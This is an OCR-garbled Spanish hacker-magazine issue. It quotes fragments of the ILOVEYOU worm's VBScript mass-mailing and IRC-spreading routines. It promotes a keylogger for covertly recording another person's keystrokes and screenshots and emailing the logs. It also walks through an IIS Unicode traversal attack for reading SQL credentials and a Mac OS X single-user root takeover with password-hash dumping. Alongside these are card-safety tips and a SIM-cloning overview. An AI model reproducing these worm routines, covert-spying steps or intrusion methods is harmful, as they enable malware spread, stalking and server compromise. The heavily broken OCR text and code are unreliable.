"HKEY CURRENT _USERASoftwarelMicrosoftiWABX 


“Smalead, 1,”REG_DWORD” 

end if 

x=Xx+1 

next 

regedit.RegWrite 

“HKEY CURRENT_USERASoftwareWMicrosoftiWABN 
“S£a,a.AddressEntries.Count 

else 

regedit.RegWrite 

“HKEY CURRENT_USERASoftwareWMicrosoftiIWABA 

“Sa, a.AddressEntries.Count ' 
end if 

next 

Set out=Nothing 
Set mapi=Nothing 
End sub 


La sintaxis superior permite simplemente crear el mensaje del e-mail 
que contiene el virus y mandarlo a todos los miembros de nuestro li- 
bro de direcciones. Podemos advertir que el sujeto que contiene el vi- 
rus es “I Love You”, que el cuerpo del mensaje, es decir el texto es 
“kindly check the attacched loveletter coming from me”. Lo habéis en- 
tendido, este mensaje personal pide a nuestro correspondiente abrir la 
carta de amor en el archivo adjunto, está destinado a picar la curiosi- 
dad del receptor del mensaje con la finalidad de impulsarlo a abrir el 
archivo adjunto. Finalmente, el código del virus (love letter for 
you.ht.vbs) se añade como archivo adjunto a los mails enviados. 

En el código fuente del archivo que contiene el virus | Love You una sub- 
rutina genera automáticamente una pagina HTML que será transmiti- 
da a nuestros correspondientes a través del IRC. Esta pagina HTML 
contiene un ActiveX (vbscript) con la finalidad de llamar la atención de 
la víctima. La sintaxis siguiente permite visualizar un texto corredizo en 
la pantalla. 


A E: ca 


>»Difusión del virus a través de ¡RE 


Sub html 

On Error Resum Next 

Dim 
Lines,n,dtal,dta2,dtal,dt2,dt3,dt4,11,dt5,d 
T6 

Dtal="<HTML><HEAD><TITLE>LOVELETTER - 
HTML<?- ¿TITLE><META 

NAME=4-GGeneratore- CONTENT=4-(ABAROK VBS 
LOVELETTEREC-CGeneratore-e >"sevbcrlf_ 


“¿META NAME=e-CAuthore-€ CONTENT=4-Espyder 
¿-¿ ispyderemail.com ¿-¿ 
CGRAMMERSOft Group ¿-¿ Manila, 
¿-¿ March 2000€->"evbcrlfg_ 
“META NAME=4-GDescriptione-e CONTENT= 
-Qsimple. but ¿1 Mthink this de 
Q>"svbcrlfg_ 

127? - ¿HEAD><BODY 
ONMOUSEOUT=4-Ewindow.name=H-fmaint-+*;win- 
dow. open (H-HLOVE-LETTER-FOR-YOU.HTM+H 
-+,H-Hmaint-+)e-e “svbcrlfge_ 


Philippines 


good...te- 


12 | www.nacker-journal.com 


www.hacker-journal.com | 13 


UTILIZAR UN KEYLOGGER PARA PROTEGER NUESTRA PRIVACIDAD 


¿Alguien curiosea en vuestro ordenador, o lo utiliza sin autorización? 


September 27. 102 


yIo3g€s 


AmecisCO, 
no Spin surveillance technologies. 
¡open! 


ceylogger. 
Welcome to key! 
specializing in the devel 


Home ory - $99 
Products alone 512K Flash Mem 


Logger Stanót 129 
Downloads Pr y ose Keyboard - from $ 


Order 
support 
Contact us 
News 


ped, including emails, instant messa 


+ Records everything PE ya ash memory 


website addresses into bull 
m 
+ No new software to install or leas 


+ Simple to install, Just PIVO itin 
+ Uses no system resources 


altime backup device 


keyghost.com 
veden encon 


+ Excellent res 


En las direcciones www: 
www.amecisco.com se P ct 
hardware, completamente | 


quel icono estoy seguro 
que no estaba ahí. Estos 
mensajes electrónicos no 
recuerdo haberlos des- 
cargado o leído...” 

¿No les ha sucedido alguna vez de encon- 
trar vuestro ordenador de casa o de la ofi- 
cina con algunas diferencias con respecto a 
la ultima vez que lo habéis apagado? Di- 
gamos que no es lo normal pero puede su- 
ceder. 

Familiares “curiosos”, colegas envidiosos 
de vuestros triunfos y de la buena reputa- 
ción que estáis adquiriendo, como vuestro 
jefe intenta aprovecharse de vuestras ide- 
as... todas las situaciones pueden represen- 
tar una amenaza a vuestra privacidad y a 
la seguridad de vuestro ordenador. 


» El guardián digital 


¿Pero como darse cuenta de estas intro- 
misiones? Desde siempre en toda 
respetable novela de intriga, la téc- 
nica más eficaz consiste en colocar 
una trampa para el “curioso” y 
buscar así de cogerlo con las manos 
en la masa. 


inc. We are a company 


ges, chats, and 


y 
trar keylog9e" 
bles al sistema: 


¿Esconderse detrás del escri- 
torio?, ?Videocámaras es- 
condidas? Beh... si de veras 
tenéis tiempo y dinero para 
perder porqué no, pero si 
éste no es vuestro caso, en- 
tonces podéis recurrir otra 
vez a la tecnología que po- 
ne a vuestra disposición 
trampas confeccionadas y 
de fácil manejo. También 
podríamos instalar discos 
duros removibles, progra- 
mas de criptografía y todo 
lo que pueda proteger 
nuestros datos, éstos son 
solo trucos que no reve- 
lan nada sobre la identidad del 
agresor quien podrá continuar a traba- 
jar sin problemas. 
Para recopilar datos que nos lleven hacia 
el culpable resulta de fundamental im- 
portancia saber que hace éste “curioso” 
dentro de nuestro PC, que razón lo im- 
pulsa, cuáles son los documentos que le 
interesan y cómo los utiliza después de 
encontrarlos. 
2Cómo podremos llegar a toda esta in- 
formación? 
Beh... cualquiera sabe que para utilizar 
un ordenador se tienen que pulsar teclas, 
seleccionar aplicaciones y abrirlas con el 
puntador del mouse; entonces nosotros 
aprovecharemos y sacaremos partido 
precisamente de esta “limitación técni- 
ca”, memorizando cada tecla pulsada y 
cada programa utilizado por el curioso. 
KeyLoggers son instrumentos crea- 
dos con ésta finalidad; registran 
consecutivamente cada actividad, 
como aplicaciones ejecutadas, introduc- 
ción de textos, salvando todo un archivo 
log que resultará extremadamente deta- 
llado. Los KeyLoggers que se encuentran 
en internet son muchos, nosotros anali- 
zaremos Windows Keylogger 5.04, es la 
última versión del más completo hasta 
ahora. 


14) www.hacker-journal.com 


>> Instalación y uso 


El programa, que se descarga del sitio 
www.littlesister.de, no necesita instala- 
ción ya que es un auto-extract que se 


Windows Keylogger 55,04 rogisterad far; Temp EVIDENCE, 
Protocol | Scheduler | Options | Registation/Instalation | About Windows Keylogger | 


El 


Start Stop 


Logging Engine Status 
e ieunloaded 


Atostart 


Remember that you have to restart the Logging Engine for any changes to take effect! 
Loglle Configuration 


Save protocol 


eos [eSorogranmiKoslogge TS 


Í 


e 


Visual Monitoring 


7] Take Scteenshol Pictures every [10 


Se inicia con las programaciones más 
fáciles como el autostart, el procedi- 
miento para salvar el archivo log con un 
nombre y el tiempo entre el cual realizar 
los screenshots. 


Protocol Scheduler | Options | Aegisration/Instalation | About Windows Keylogger | 
Y Use Schedules 

Doy End Time 

Y Monday Ñ 

7 Tuesday 

Y Wednesdoy 


En la segunda pantalla se puede definir el 
horario de inicio y cierre del programa, así 
como su autodestrucción. 


Protocol | Scheduler. Dolions | Begistrtion/1nstaltion | About Windows Keylogger | 


[Y Enable LogFile ej air (y A 
a Y Entistoficdlaio] — Testematconío..| O 
Mailer Options 
fa Computer uses Windows DUN Network. (Comp. has permanent Intemet connection: 
When to send logíile 


[YOUR.-EMAILO-HERE-.C y é 
(5 Send file evely jo 1 20 


Send To: 


a 4 eMal [se di Byaho: co days  hous mínules 
¡ende Ss 


€ When size teaches | KBytes 


AU [sepsercacon 


Security 


FT Password Protection 
Tor this Tool 


7 Logíle backdating 


En la tercera pantalla se configuran las 
opciones de envío con un email del ar- 
chivo log. 


A 


AL ESPÍA... 


» E 


Sorprendedio con las manos en la masa registrando todo lo que hace. 


descompacta en el directorio 
que le indiquéis. 

Abrir el ejecutable creado y se 
inicia el juego. 

La pantalla con la que os encon- 
traréis es la primera de las cinco 
que componen la configuración. 
El setting es muy intuitivo pero de 
todos, modos vamos a analizar 
los procedimientos más impor- 
tantes. Para que se recopile toda 
la información es necesario 
que el programa sea ejecu- 
tado de manera automática 
al encender el ordenador, en 
seguida debéis settare donde vendrá 
salvado el file log. Una de las opciones más 
utilizadas que puede utilizarse en caso de 
ser necesario consiste en la opción de “to- 
mar fotografías” de todo lo que suce- 
de en la pantalla. Éstas son asociadas 
directamente al reporte final que 
se visualizará como una página 
web. Si no queréis, obvio, que el | 
programa registre vuestras tare- | 
as, podéis establecer la hora de 'M 
inicio. y cierre automática. Así 
cualquier acción realizada en el 
PC desde afuera, por ejemplo, 
en horario de oficina será log- | 
gada y podremos consultarla. 
¿Tenéis miedo de que el curio- 
so descubra la trampa?No te- 
máis, activando la opción 
de autodestrucción, el 


mágicamente a la fecha 
fijada. 


>> Ver los resultados 


Ah... finalmente las tan esperadas vaca- 
ciones... eh si, pero vuestro ordenador?!? 
¿Abandonado al cuidado de cualquiera 
que le quiera poner las manos encima? 2 
Esto es impensable! De nuevo Keylogger 


" 
o eee 


> collega a cena e feo 


opto Loggioa Engine started at 15: 
pra 


sep SANDRONTV 


En el lado izquierdo, se observa como se abre el archivo de 


si se clica sin utilizar el program ( 
Utilizando el programa lograréis ver todas las operaciones 


efectuadas (derecha) 


te ayuda con una opción en la tercer pá- 
gina de configuración: email log. Podéis 
decidir si recibir los archivos por mail 
a una determinada hora o cuando 
alcanza una capacidad definida; 
puedes seleccionar entre varias imposta- 
ciones y verás que sumergido 
en los ma- 
res tropica- 
les no per- 
deréis la po- 
sibilidad 
de... investi- 
gar al investi- 
gador! 
Pero ahora 
que tengo los 
files de log 
¿como los 
veo? 
Espero no ha- 
yáis pensado 
que era  sufi- 
ciente hacer doble clic en el .txt... ¿ver- 


Arosa 


y respetable, KeyLogger implementa 
un sistema de serie de números del 
ouput que puede ser resuelto sólo utili- 
zando una opción específica en la primer 
página de la configuración del progra- 
ma. Finalmente, el resultado; una serie infi- 
nita de aclaraciones del uso impropio de 
vuestro PC, acompañadas de imágenes to- 
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ma de decodificar el encriptado. 


madas en el desktop, cambios en car- 
petas y documentos, hasta llegar al 
máximo detalle de cada tecla pulsada. 
A este punto queda a vosotros invitar 
a vuestro amado colega a cena y 
avergonzarlo entregándole la impre- 
sión de su “curiosidad ”... aparte de la 
cuenta, es obvio... :D 
¿Pero el engaño dónde está? Efecti- 
vamente se debe admitir que en in- 
log, — ternet no es difícil descubrir los 
antiKeylogger. Son programas 
que escanean el ordenador y descu- 
bren a nuestros “aliados”. Tal vez hoy 
tenemos suerte que no se encuentran 
muchos para Windows XP y aquellos disponi- 
bles no pueden encontrar el KeyLogger en 
acción. En la espera de futuros desarrollos, 
especialmente relacionados al proyecto Palla- 
dium de Microsoft ( que deberá impedir el 
funcionamiento de programas similares), go- 
cemos de esta posibilidad de trabajar sin ser 
molestados, disfrutando sin ningún coste de 
éste pequeño “agente secreto” personal. % 


CATARA4TTA, 


| DINÁMICA DE UN ATAQUE A MICROSOFT IIS Y SQL SERVER 


Don Juan explica cómo un malintencionado puede entrar de puntillas a un servidor web que 


utilice una plataforma Microsoft, hacer lo que quiera, y salir sin dejar ni rastro. 


ue los servidores web son poco 
seguros lo sabemos todos, pero 
no son tantos los que conocen 
cuales son efectivamente los 
problemas de esta plataforma. Como de 
costumbre, todos hablan, pero son pocos 
los enterados. Intentemos ahora imaginar, 


que no haya sido conve- 
nientemente configurado y actualizado. 
Por último, veremos cuáles son las precau- 
ciones que se deben tomar para prevenir 
ataques de este tipo sobre el propio servi- 

| dor. 
Normalmente, el ataque provendrá de 
una conexión a Internet de un gran pro- 
veedor como Terra o Eresmas, al que ha- 
brán sido suministrados datos personales 
falsos. En realidad, el hacker sería igual- 
mente localizable, ya que estos proveedo- 
res registran el número de teléfono de la 
línea utilizada para la conexión (y utilizar 
el servicio de Telefónica que permite ocul- 
tar el número de quien llama, en estos 
casos no sirve). Si no es un desprevenido, 


, de modo que confunda las 
aguas. El software necesario es bastante 
caro, pero seguramente no habrá sido 
adquirido con las licencias regulares de 
Windows 2000 y de SQL Server Desktop 
Edition o Developer Edition. 

Los servidores susceptibles a este tipo de 
ataque son IIS 4.0 o superior, SQL Server 
7.0 o superior y no son protegidos por un 
cortafuego. No todos los administradores 
actualizan IS como es debido y muchos 
probablemente : 


¿Para ve- 


rificar el tipo de servidor y el sistema ope- 
rativo, el hacker utilizará probablemente 
un servicio como el de 

que es capaz de im- 
plantar la plataforma sobre la que funcio- 
na cualquier sitio web. Para descubrir si 
hay un cortafuego, el hacker realizará un 
escaneo de los puertos sobre puertas di- 
ferentes a la 80; en este caso un sistema 
de detección de intrusos (IDS), podría ha- 
cer sonar la primera señal de alarma, e 
impedir fases sucesivas del ataque. 


El primer paso del hacker, será el 

de utilizar un URL mal formado 

(malformed url) de tal manera que 
apunte al archivo 
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ciiwinntisystem321cmd.exe y ejecute 
el comando dir (informaciones sobre este 
tipo de ataques, con ejemplos de script 
perl utilizados, se pueden encontrar en 
www.bismark.it). Si el hacker tiene suer- 
te, a este punto verá el contenido del direc- 
torio: el sistema se encuentra desnu- 
do delante de sus ojos. 


El hacker se trasladará ahora al di- 

rectorio donde se encuentran las pá- 

ginas asp, es decir el sitio propia- 
mente dicho (probablemente 
cinetpublwwwroot) y, utilizando el. co- 
mando type, intentará visualizar el conteni- 
do del archivo global.asa y de diferentes 
páginas asp, en busca de la cadena de tex- 
to de conexión a SQL Server, que debería 
ser del tipo: “Driver=4(Microsoft SQL SER- 
VER));SERVER=" etc. 


CÓMO EVITAR 
LOS ERRORES 


Microjunk” 


para evitar 


errores graves es necesario antes 


que nada consultar la sección 


Doesn'tworkstation:o 


deh do plrale 1: Leti vue bus an 
PA 


A relativa a las actualizaciones de 
seguridad en el sitio del productor 
del servidor (en este caso, 
www.microsoft.com/technet) . 

| El segundo error grave ha sido el 
de 
predefinida del usuario “sa” de SQL 
Server. Una lista de todos los 
pasos necesarios para hacer seguro 
SQL Server se encuentra en la web 
www.sqlsecurity.com/checklist.asp. 
Finalmente, ha introducido la 
cadena de texto de conexión a la 


contraseñas [de7acceÑ0) directanente 


en las páginas asp, en lugar de 
utilizar un DNS de sistema, método 
más seguro y aconsejable. Más 
información en: 
WWW.powerasp.com/content /datab 
ase/dsn_vs_dnsless.asp. 


> Cómo defenderse 


SEGURIDAD.uM 


COMO FUNCIONAN LAS TRANSACCIONES EN LAS COMPRAS ON-LINE 


Aunque a muchas personas les da miedo enviar vía Internet el propio número 


de tarjeta de crédito, la mayor parte de páginas que ofrecen e-commerce 


son más seguras que pagar en el restaurante o hacer cola en el cajero. 


Siempre que verifiquemos bien a quien estamos entregando nuestro dinero. 


as múltiples posibilidades que 

ofrece la red han creado nuevas 

respuestas que permiten a las 

empresas, tiendas, bancos y su- 

ministradores de servicios tener 
una relación directa con el consumidor, in- 
dependientemente de los distribuidores o 
intermediarios y del lugar en el que se en- 
cuentre el cliente. El instrumento que mejor 
se ha adaptado a internet ha sido, sin duda, 
la tarjeta de crédito: una serie de números 
que nos permiten comprar on-line bienes y 
servicios, pagándolos directamente desde 
nuestra casa. Es un sistema mucho más có- 
modo que tener que efectuar una transfe- 
rencia bancaria o un ingreso al contado en 
una cuenta corriente postal. 


Independientemente del 
tipo de producto o servi- 
2 cio adquirido, el funcio- 
namiento de este tipo de 

transacciones es el mismo: se proporcio- 
nan al merchant (el que está vendiendo al- 
go) todos los datos necesarios y éste se en- 
cargará de poner en marcha la tramitación 
ante el gestor de la tarjeta de crédito. 


Frente un posible pago con tarjeta de 
crédito, una de las primeras preguntas que 
uno se hace es siempre la misma: “¿Es posi- 
ble que alguien pueda acceder a los datos 


sensibles de mi tarjeta?” La respuesta, desde 
un punto de vista lógico, sólo puede ser afir- 
mativa: esta posibilidad existe. Obviamente 
quedaría por verificar el verdadero factor de 
riesgo que representa el tener que introducir 
números y fechas de caducidad en el formu- 
lario de una web. 


>» Cómo funciona 


La mayor parte de las transacciones están 
gestionadas por bancos e institutos especiali- 
zados en el comercio on-line, los cuales en la 
gran mayoría de casos se adhieren a deter- 
minados modelos de seguridad. 

Tomemos como ejemplo uno de los primeros 
y más difundidos gestores de transacciones 
vía internet: “Ebankinter”. Existen muchos 
otros bancos que ofrecen respuestas para el 
comercio electrónico, pero visto que, como ya 
hemos dicho, el 99% de los procedimientos 
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están estandarizados, el ejemplo de “Eban- 
kinter” nos permitirá entender el funciona- 
miento de este tipo de comercio en modo pa- 
recido a como lo hacen otros muchos gesto- 
res.Una vez escogidos los productos que se 
quieren comprar de una hipotética web de e- 
commerce, por poner un ejemplo cualquiera, 
el usuario se encuentra delante de una pági- 
na que le pregunta como desea efectuar el 
pago: olvidándonos de otros métodos (como 
la clásica transferencia bancaria, o los más 
sofisticados pagos trámite tarjeta GSM) va- 
mos a aquello que nos interesa: la conexión 
con tarjeta de crédito. Una vez rellenado el 
formulario de la página en cuestión, el usua- 
rio pulsará el botón “enviar”: De aquí en ade- 
lante toda la transacción depende del servidor 
del banco. La transmisión de los datos pasará 
entonces por varias fases: primero el usuario 
proporciona al merchant todos los datos ne- 
cesarios para poder completar la transacción, 
después estos datos serán enviados del servi- 
dor del merchant a los servidores del banco. 


toda la información que 

pasa entre los dos extre- 

mos de la transacción 

está en efecto encripta- 

da en SSL3 a 128 bits, garanti- 

zando así que nadie pueda interferir en la co- 
municación entre las dos máquinas, para, por 
ejemplo, conseguir los datos de la tarjeta y 
usarla con finalidades ilícitas. En el caso de 
“Ebankinter” (aunque la situación es parecida 
a muchos otros sistemas de pago digital) el 


merchant instalará en su propio servidor una 
clave java hecha a posta para este proceso de 
cifrado: la clave será generada cotidiana- 
mente los servidores de la “Ebankinter”. 


de este modo resul- 
tan prácticamente imposibles 
los tentativos de desvío de la 
conexión y el consiguiente 
sniffing de las variables. Existen ade- 
más toda una serie de instrumentos post- 
transacción que confirman al usuario y al mer- 
chant el éxito del pago: a través de este in- 
forme disminuyen pues los riesgos de trans- 
acciones reiteradas, o la repetición errónea 
de un pago (debida quizás a una conexión 
lenta o como consecuencia del doble o triple 
click del usuario sobre el botón Enviar del 
formulario). 


>» En definitiva 


Cuando todo esto pasa por institutos certifi- 
cados y de confianza, las transacciones con 
tarjeta de crédito no comportan riesgos 
mayores a aquellos que corremos cuando 
realizamos una compra normal en una 
tienda: quizás son pocos los que lo pien- 
san, pero si el dependiente que maneja 
nuestra tarjeta sabe memorizar rápida- 
mente con la mirada, no le costará mucho 
confeccionarse una larga lis- 
ta con tarjetas utilizables, 


Scaro si . 
quizás en internet. 


cur 


muy a menudo a través de 
un formulario que quizás una vez completa- 
do debe ser simplemente enviado a través de 
un e-mail al merchant: en estos casos, si no 
hay otro remedio que continuar con la com- 
pra, sería bueno perder un poco de tiempo 
para informarnos sobre quién nos está ofre- 
ciendo aquel producto o servicio, y si vale la 
pena arriesgarnos a que nuestra Visa sea 
usada para que chicos de medio mundo 
puedan pagarse el acceso a alguna web 


porno. Sobretodo ahora que es todavía bas- 
tante reciente el caso de una web, que hacía 
publicidad de una empresa fantasma que 
ofrecía recargas para móviles a mitad de 
precio, 


. Prestad atención pues cuan- 
do os dispongá is a comprar algo en la red: 
la comodidad de poder efectuar transaccio- 
nes desde nuestra casa necesita también de 
una buena dosis de sentido común. La nor- 
ma general es la de siempre: no aceptar 
nunca caramelos de desconocidos. 


100% Garantizado y hasta 


m 72% a 2 años 


Enalish version 


,» Prgamilaracnoros 


La compra paso por paso 


Los pasos a seguir en una transacción con 
tarjeta de crédito y un banco de apoyo. 


El servidor del merchant envía al nave- 
gador del cliente un formulario con la 
orden de compra que debe rellenar. 


El cliente rellena el formulario y lo en- 
vía a la dirección del merchant. 


El servidor del merchant envía el nú- 

mero de la tarjeta de crédito y el im- 
porte al ordenador del instituto de crédito 
para una comprobación. 


El instituto de crédito envía al mer- 

chant una confirmación de la validez 
de la tarjeta y de la cobertura por el im- 
porte seleccionado 


El servidor del merchant envía al nave- 
gador del usuario una confirmación de 
que la compra se ha realizado con éxito. 
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¡El verdadero 
peligro está 
off-line! 

Muchos dicen que no se 

fían de las transacciones 

vía internet, pero a menudo cometen 
estupideces que pueden revelar a 
cualquier desconocido el propio nú- 
mero de tarjeta de crédito. 


No tirar nunca los tickets de 
compra por la calle 

No solo ayudaréis a mantener limpia 
vuestra ciudad, sino que además evi- 
taréis que alguien pueda recoger el 
ticket, que casi siempre lleva es- 
crito el número y la fecha de cadu- 
cidad de la tarjeta, datos suficien- 
tes para comprar cualquier cosa en 
internet. 


Pedid que verifiquen la firma 
Muy pocos dependientes comparan la 
firma del ticket de compra con la 
que está en la parte posterior de la 
tarjeta de crédito. Si os sucede al- 
go parecido, decídselo al dependien- 
te: quizás la próxima vez recordará 
hacerlo. 

El empleado de un banco nos confesó 
inocentemente que a veces realiza 
pagos con la tarjeta de su mujer, 
firmando con el nombre de ella. ¡Que 
seguridad! 


En el restaurante 

En lugar de confiar la tarjeta de 
crédito al camarero, id a pagar a la 
caja. Evitaréis que un empleado des- 
contento con su trabajo pueda copiar 
los datos de la tarjeta. 


En la cola del cajero o en la 
caja 

Cuando estéis haciendo cola junto a 
otras personas, no saquéis la tarje- 
ta de crédito hasta el último momen- 
to, o cubrid el número con la mano. 
Hay personas que están entrenadas 
para memorizar rápidamente los da- 
tos, y acechan en lugares como estos 
para poderlos “atrapar”. 


= MAC HACK. 2 


ll 


da 


¡Contraseña 
a la vista! 


Algunos usuarios del 

Mac OS X podrían encontrar entre 
sus preferencias (en - 
/Library/Preferences) el archivo 
Finders Prefs. 

Ya el nombre resulta sospechoso 
(¿porqué el plural de Finder?), 
pero si además se observa el 
archivo con un editor de texto, 


hay de que preocuparse: [buscando 


Esto supone un grave peligro para 
la seguridad del sistema, porque 
una persona que tuviese acceso 
físico al ordenador, podría leer 
la contraseña del administrador. 


el programa MOX Optimize, que 


sirve para habilitar funciones 
ocultas y hacer que el 
funcionamiento del sistema sea 
más rápido. 

Debido a una torpe programación, 
para poder funcionar MOX 
Optimize necesita la contraseña 
de administración, y para no 
tener que pedirla cada vez al 
usuario, la guarda en el archivo 
en cuestión. Quien está 
interesado en la propia 
seguridad, debería borrar el 
archivo y, si aún así quiere 
utilizar MOX Optimize, 
introducir cada vez la 
contraseña. 


18. MOXOptimize. bois 0 


04,0 Configure Hidden Mac OS X options, 


V Selecta feature | More settings panel 5 Password. 


1 Accel. Finder | Appearance | Disk | Dock ' Network | Startpltems | UNIX 


Any user 
[4 Disable Finder Zoom Rectangles 
6 Disable Antí Allasing 


Hide seconds in the clock 
Intermediate 


4 Hide Invisible files in the finder 


You must relaunch the finder to app ly changes 


| Mouse turboboost 13) 
[0% 100% 200% 300% 400% 500É | 


Changes take effect after logout 
tr ” 

Í 

| Y Help and more into 


3 


COMO INHABILITAR LA MODALIDAD SINGLE USER 


IIA a ie 


ir 


abiendo sido pensado para el uso 

personal, el Mac OS X tiene dos 

grandes carencias en términos de 

seguridad: en primer lugar, es 

posible modificar la contra- 
seña del administrador tan sólo 
usando el CD de instalación. Pero si no 
es bastase con esto, cualquiera puede tener 
acceso al sistema como root simplemente 
reiniciando el Mac, mientras mantiene pul- 
sadas las teclas Comando+s, y sin que le 
sea necesaria una contraseña. De este mo- 
do se entra en la modalidad “single user”, 
una shell Unix sin interfaz gráfica pero que 
tiene libre acceso a cualquier archivo, sin 
restricción alguna. 


Después de haber reiniciado el ordena- 
dor manteniendo pulsadas las teclas Co- 
mando (manzana)+s, el malintenciona- 
do podría subir el volumen / con 
/sbin/mount -wu/. 

Al llegar a este punto, reiniciados los servi- 
cios de red con /sbin/systemStarter, 
podría cambiar la contraseña de root por 
otra a su elección, tecleando passwd ro- 
ot seguido de la nueva contraseña. 

En éste caso, el usuario legítimo ya no 
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RAS EAN RA RENAL EE NET AIA SIRENA 


Para que los usuarios distraídos puedan reencontrar 
la propia contraseña, Apple ha dejado una puerta abierta 
en la seguridad del Mac 0S H. 


podría conectarse como root al pro- 
pio sistema. Pero las cosas podrían ser to- 
davía más graves. Moviéndose sin proble- 
mas por los archivos del sistema, el ata- 
cante podría conseguir los archivos con 
contraseñas cifradas ( o todavía más fácil, 
utilizad nidump passwd), para descifrarlas 
con más calma en otro lugar, usando un 
ataque a fuerza bruta para descifrar el 
hash de la contraseña. De esta manera, el 
atacante habría conseguido las contrase- 
ñas sin comprometer el sistema de modo 
evidente, y tendría acceso al ordenador en 
cualquier momento (también a distancia, si 
han sido habilitados los servicios Telnet y ftp). 
Como en el caso de la funcionalidad del 
CD de instalación, esta “grieta” aparente, es 
en realidad una funcionalidad prevista para 
que los usuarios con poca memoria puedan 
recuperar la contraseña. Esto no quiere de- 
cir que la grieta en la seguridad no sea im- 
portante, sobretodo si el Mac en cues- 
tión está a disposición del público en 
general ( Internet café, tiendas, 
stands de ferias, ... ) 


Por suerte, alguien ha pensado poner reme- 
dio a este problema. Este alguien es Maruk- 
ka, del Macintosh Security Group, que ha pu- 
blicado una versión modificada de uno de los 
componentes del Mac OS X, /mach_init, que 
impide el reinicio en modalidad Single User. 
La patch puede descargarse en: www.secu-= 
remac.com/disablemacosxsinglebo- 
ot.php. Antes de instalarla, se debe tener en 
cuenta que se trata de una modificación no 
soportada, y que su instalación no comporta 
la creación de una copia de backup de la ver- 
sión precedente mach_init, copia que convie- 
ne efectuar manualmente en el caso que se 
quisiera restaurar la versión original. 


Si pensáis que clonar un móvil es imposible, sólo tenéis 


que daros una vuelta por la red para cambiar de idea... 


obre la clonación de los mó- 

viles y la interceptación de 

los mensajes telefónicos co- 

rren una serie de divertidas 

leyendas urbanas y bromas 
de todo tipo. Paseando por los numerosos 
forums de internet puede llegar a leerse 
que para recargar una tarjeta telefónica de 
gorra, basta con cocerla un poco en el mi- 
croondas. Desaconsejamos absolutamen- 
te hacerlo porque seguramente se trata de 
una broma puesta en circulación por al- 
gún simpático de turno, aunque no duda- 
mos que haya habido casos de tarjetas 
SIM “recalentadas”. 


» Criptografía 
a 128 bits 


La protección de los GSM (Global System 
for Mobile Communication), y en particu- 
lar de las comunicaciones, deriva de la 
adopción de un sistema de transmisión de 
datos cifrado. En práctica se trata de una 
especie de alfabeto personalizado que 
permite enviar mensajes, en el curso de la 
comunicación, privados de cualquier sig- 
nificado. Pongamos un ejemplo: Quere- 
mos comunicar la palabra Barcelona, si 
como sistema de criptografía decidimos 
sustituir cada letra de la frase con aquella 
inmediatamente sucesiva, la palabra en- 
viada será Cbsdfmpob, que no tiene nin- 
gún significado. No es así para el usuario 
que la recibe, porque esta palabra encrip- 
tada está codificada por un algoritmo en 
clave contenido en la SIM (la tarjeta que 
activa el móvil) que, en el caso del ejem- 
plo, tendría un valor 2. Para forzar una 
criptografía de éste tipo y interceptar los 
mensajes bastaría con forzar todos los al- 
goritmos del 1 al 26, el número de letras 
del alfabeto, hasta encontrar la clave ade- 


cuada. Pero evidentemente el sistema de 
protección de un GSM es mucho más 
complejo. Está basado, en efecto, en un 
algoritmo de codificación contenido en la 
SIM y que se llama COMP128. Este algo- 
ritmo trabaja sobre un mensaje encripta- 
do que sólo puede ser traducido por una 
SIM a 128 bits (claves) y prevé otras 
150.000 posibles combinaciones. Si al- 
guien quisiera atacarlo a distancia tendría 
que estar conectado con la tarjeta SIM al 
menos ocho horas consecutivas. Mientras 
que teniendo la SIM entre las manos harí- 
an falta pocos segundos para forzar el có- 
digo y clonar la tarjeta. 


» El ataque particionado 


Partiendo de éste último postulado, el equi- 
po de investigación de IBM ha localizado 
un nuevo sistema de ataque (particionado) 
a las tarjetas que permite extraer la infor- 
mación clave secreta de las SIM controlan- 
do los canales laterales, como absorción 
de la corriente de energía y las radiaciones 
electromagnéticas. El ataque puede obte- 
ner la información clave en pocos minutos. 
Charles Palmer, director del laboratorio de 
Seguridad de Redes y Criptografía de IBM 
afirma: “Los teléfonos GSM están aumen- 
tando y cada vez más a menudo incluyen 
SIM toolkits que permiten realizar opera- 
ciones como: transferencias bancarias y 
servicios añadidos. En todas estas situacio- 
nes, los datos de identificación quedan 
grabados en la memoria de la SIM. Si es- 
tos toolkits no se conciben con cuidado pa- 
ra que estén protegidos de los ataques, in- 
cluidos los ataques “particionados”, enton- 


Dual Band: Móviles GSM 
compatibles con 

ambas tecnologías digitales 
sea a 200Mhz o a 1800Mhz. 
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Gprs General Packet Radio 
System: Éstandar para la transmi- 
sión de datos en la red de telefonía 
móvil a través de la transferencia 
por paquetes, soporta sea la con- 
mutación de circuito (GSM), que 
los SMS. La máxima velocidad es 
de 115,2 Kbps, utilizando simultá- 
neamente los ocho timeslot dispo- 
nibles, delante de los 9,6 Kbps 

del GSMr. 


ces será muy fácil para un hacker duplicar 
la información de la tarjeta.” Las investiga- 
ciones de IBM han desarrollado una técni- 
ca para proteger la operaciones de bus- 
queda en tablas, que se verifican, por 
ejemplo, cuando la SIM se usa para trans- 
ferencias bancarias, de los ataques a los 
canales laterales (side-channel attacks). 
Cuando se pone en marcha una. opera- 
ción en la SIM, se controla una tabla de 
consulta en la memoria, con el fin de obte- 
ner un valor almacenado en una posición 
concreta. Los investigadores han desarro» 
llado una técnica que reemplaza una ope- 
ración simple de búsqueda en una tabla, 
por una secuencia de búsquedas en tabla 
en posiciones aleatorias, que no propor- 
cionan ninguna información relevanté. Es- 
to se consigue usando una pequeña tabla 
generada aleatoriamente, una especie de 
señuelo tecnológico. La información lateral 
de los canales quedará camuflada y no se- 
rá de ninguna utilidad para un hacker. 
Puesto que la técnica propuesta usa poca 
RAM para la tabla dependiente, puede 
aplicarse fácilmente para proteger una 
gran variedad de dispositivos de memo- 
ria, incluidas las SIM. Los que posean 
GSM pueden en todo caso protegerse 
con métodos menos tecnológicos pero 
igualmente eficaces: como evitar prestar 
el teléfono a desconocidos y dejarlo des- 
atendido. Ká 


| 


ara 
pomos 


Unin-like 


SEGURIDAD . 


TAMBIÉN LOS PINGUINOS “LLORAN” 


Cómo eludir el servicio 
de log en una máquina 


¿Entrar en un PC con 

un sistema Unix sin 

dejar huellas? Os 
explicamos cómo, 

eso sí no hagáis gilip......es 


>» Descripción y 
funcionamiento 


Si sois neófitos de Linux, podríais no tener fa- 
miliaridad con los logs, que se han converti- 
do en un mecanismo de base en los orde- 
nadores, ¿Qué es exactamente el log? Es el 
registro de la información de sistema y se 
efectúa mediante syslogd, es decir el dae- 
mon de log de sistema que permanece a la 
escucha de las informaciones que recibe de 
los varios programas que puede escribir en 
los logs (registros) o bien ignorar en función 
del contenido del archivo de configuración, 
